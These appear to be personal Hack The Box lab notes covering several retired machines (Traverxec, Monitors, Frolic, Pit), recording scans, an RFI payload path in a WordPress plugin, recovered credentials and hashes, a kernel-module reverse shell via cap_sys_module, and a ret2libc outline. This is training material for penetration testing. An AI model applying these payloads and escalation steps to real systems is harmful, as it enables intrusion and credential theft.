tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8086          0.0.0.0:*               LISTEN

8443 → is another go ssh (in localhost) 8086 → influx

if we connect to the ssh, we see a chat, but there is a new commands /file but you need a password the backup is only readable by catherine.

I think there should be some kind of “pista” in the influx db “CeilingCatStillAThingIn2021?”

Link to original

Machine - Traverxec - Retired - Easy

Machine - Traverxec - Retired - Easy

IP=10.10.10.165

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploration

fuzz

human

http-enum

exploit

searchsploit shows that there is a remote code execution on nosotrom 1.9.6…

www-data to…

• there is a user named david
• no suid
• uname Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
• debian 10
• processes
• found this hash david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
  • Nowonly4me
• the folder in ~david is visible by www-data
• there is a copy of the id_rsa

david to root

uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

there is a video… lets capture the frame

cat /dev/fb0 > file.raw cat /sys/class/graphics/fb0/virtual_size ⇐ to know the size https://rawpixels.net/ ⇐ we can see the image

video doesn’t seem to give us anything…

dip is for controlling the dial up (modem)

plugdev

netdev

there is a script that we can run as sudo…

is the journalctl, that spwans a less pager

Link to original

Transclude of Machine---secnotes---windows--medium

Machine - Monitors - Hard

Machine - Monitors - Hard

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

$  nmap -sC -sV -p80,22  10.10.10.238 -Pn -oN  ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ nmap -sV --script=http-enum -p80 10.10.10.238

Exploratory

SSH → doesn’t seem vulnerable HTTP →

Sorry, direct IP access is not allowed.  
  
If you are having issues accessing the site then contact the website administrator: admin@monitors.htb

add to the hosts files

we see a wordpress :) 5.5.0

Wordpress vuln?

fuzz using https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt and curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt > wp-plugins.tx

plugins → nothing interesting found… themes → nothing interesting found

looking to the code, I see the use of spritz

there is a remote file inclusion :)

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

let’s also see the host, since I think there is multiple vhosts… (no luck)

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"

define( 'DB_NAME', 'wordpress' );
 
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
 
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

#ServerName www.example.com
	ServerAdmin admin@monitors.htb
	ServerName cacti-admin.monitors.htb
	DocumentRoot /usr/share/cacti
	ServerAlias cacti-admin.monitors.htb
	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn
	ErrorLog /var/log/cacti-error.log
	CustomLog /var/log/cacti-access.log common
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf

cacti-admin.monitor.htb, we can login as admin and the password of the database..

also in searchsploit there is a vuln with an exploit that opens an nc

from www-data to …

• ps

  1355 ?        Ssl    0:00 /usr/bin/containerd
  1373 ?        Ssl    0:00 /usr/lib/policykit-1/polkitd --no-debug
  1420 tty1     Ss+    0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
  1496 ?        Sl     0:03 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
  1512 ?        Ss     0:00 /usr/sbin/apache2 -k start
  1586 ?        Ssl    0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
  2091 ?        Sl     0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
  2102 ?        Sl     0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/109e2d8f43c5a10ddb0b3b823c3c1efc095a7c76b4397c73c4a14c6de917d0a4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
  2135 ?        Ssl    0:05 /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
  2309 ?        Ssl    0:50 /usr/local/openjdk-8/bin/java -XX:MaxPermSize=256m -XX:+HeapDumpOnOutOfMemoryError -Xmx1024m -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /root/.gradle/wrapper/dists/gradle-3.2.1-bin/erlz51pt56t1o6vc7t39cikug/gradle-3.2.1/lib/gradle-launcher-3.2.1.jar org.gradle.launcher.daemon.bootstrap.GradleDaemon 3.2.1
  2361 ?        Sl     1:38 /usr/local/openjdk-8/bin/java -Xms128M -Xmx1024M -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /usr/src/apache-ofbiz-17.12.01/build/libs/ofbiz.jar org.apache.ofbiz.base.start.Start

we see:

• docker on port 8443

• java

• Ports — 3306 >> mysql >> user of admin wp $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 >> try to crackit with john >> not :’( — 8443 ?

• in marcus folder

• there is a .backup folder, that I cannot read

there is running an ofbiz 17.12.01 as root (maybe in the docker?) an is vulnerable! for that first … I will use chasel to have the port 8443 to my localhost

→ got it, I have a shell as root → but I am in a container :(

capsh --print shows that I have cap_sys_module

with this privilege we can insert new kernel modules ⇒ we crafted a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module

Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Link to original

Machine Pit - Hard - abandoned

Machine Pit - Hard - abandoned

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
9090/tcp open  zeus-admin syn-ack ttl 63

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:

9090→ is a dms? a kind of a login into the machine… 80 → empty port 22 → openssh doesnt seem vulnerable

Link to original

Machine - Frolic - Easy

Machine - Frolic - Easy

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
1880/tcp open  vsat-control syn-ack ttl 63
9999/tcp open  abyss        syn-ack ttl 63

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds  Samba smbd 4.3.11-Ubuntu
1880/tcp open  vsat-control?
9999/tcp open  abyss?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m26s, deviation: 3h10m29s, median: 32s
| smb2-time:
|   date: 2021-11-06T17:18:04
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2021-11-06T22:48:04+05:30

9999 → nginx

PORT     STATE SERVICE VERSION
9999/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /backup/: Possible backup
|_  /test/: Test page
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

in the backup there is a password.txt that says

password - imnothuman
user - admin

credentials → not valid for node-red

in the admin page, the security was by js, when we can login as admin we see

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
!.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
.?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
!.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
!!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
!!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
!!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
..!.! !!!!! !.?.

could be https://esolangs.org/wiki/ook! language?

after looking for a ook online page we get this message Nothing here check /asdiSIAJJ0QWE9JAS

where we found this

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA

after decoding, and looking at the magic numbers, we see it’s a ZIP file :)

we try to unzip it… but asks a password inside there is a index.php file

with john2zip we got the hash of the file. we can crack it now with john. the password is password

and the index.php file has. ..

4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

seems hex lets put this into ascii…

KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

we decode de b64 to…

+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

idkwhatispass

1880 → node red

PORT     STATE SERVICE VERSION
1880/tcp open  http    Node.js (Express middleware)

smb →

SMB         10.10.10.111    445    FROLIC           [+] \admin:imnothuman
SMB         10.10.10.111    445    FROLIC           [+] Enumerated shares
SMB         10.10.10.111    445    FROLIC           Share           Permissions     Remark
SMB         10.10.10.111    445    FROLIC           -----           -----------     ------
SMB         10.10.10.111    445    FROLIC           print$                          Printer Drivers
SMB         10.10.10.111    445    FROLIC           IPC$                            IPC Service (frolic server (Samba, Ubuntu))

samba → 4.3.11

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/falsesystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/falsesystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/falsesystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/falsesyslog:x:104:108::/home/syslog:/bin/false_apt:x:105:65534::/nonexistent:/bin/falselxd:x:106:65534::/var/lib/lxd/:/bin/falsemysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/falsemessagebus:x:108:112::/var/run/dbus:/bin/falseuuidd:x:109:113::/run/uuidd:/bin/falsednsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/falsesshd:x:111:65534::/var/run/sshd:/usr/sbin/nologinsahay:x:1000:1000:Ayush Sahay,,,:/home/sahay:/bin/bashayush:x:1001:1001:,,,:/home/ayush:/bin/bash

two new users ayush and sahay

 "_credentialSecret": "46e43b7222a93bc2b3b5d4aad74d7ad009057e9913549e52ebba6632b96ec850",

            password: "$2a$08$M6GkqpR1GdCDkQYXsR4zGOCl4gA/vWgNBSNKzCRr2RFKyYJNf08q.",

finally we see there is a rop file, that has suid!

we should buffer overflow it? :)

Buffer overflow

• lets copy the binary to our machine to do it better :)

• install gef for gdb

  • to see the protections of the binary checksec in gdb
  • we have NX activated ⇐ meaning we cannot execute code in the stack
  • pattern create give you a pattern
  • run "<pattern here>"
  • pattern offset $eip ← shows we have a 52 bytes to exploit

• ret2libc since we have NX active (stack execution protection) → we need to use

  • we need addr for system /bin/sh and exit
  • in the victim machine we can 1 get the base addr of libcc
    • ldd <binary> → 0xb7e1900
  • get the offsets of system and exit
    • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    • we get the value of the system@@GLIBC_2.0 → 0003ada0
    • exit → 0002e9d0
    • to get the offset of a /bin/sh occurence:
      • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh → 15ba0b
  • to get the full address of the
  • ret2libc = addr_of_system + addr_of_exit + addr_of_bin_sh

• is aslr active? cat /proc/sys/kernel/randomize_va_space (0 means no, 2 means yes)

Link to original